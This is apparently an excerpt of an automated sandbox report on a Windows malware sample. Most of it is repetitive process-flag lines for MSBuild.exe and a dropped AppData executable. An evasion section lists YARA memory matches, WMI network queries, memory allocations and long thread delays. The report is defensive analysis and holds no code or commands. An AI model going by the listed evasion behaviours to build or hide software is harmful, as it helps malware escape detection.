                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 1100000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 5600000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 6600000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 6730000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 7730000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: ADE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: BDE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: C270000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: D270000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: E270000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: F270000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 10BA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 11BA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 12BA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeMemory allocated: 13BA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1200000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 5150000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 5830000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 6830000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 6960000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 7960000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 9A00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: AA00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: BA00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 5830000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 6840000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: 6840000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: A130000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: BE90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeMemory allocated: CE90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1230000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2E60000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C80000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1199955
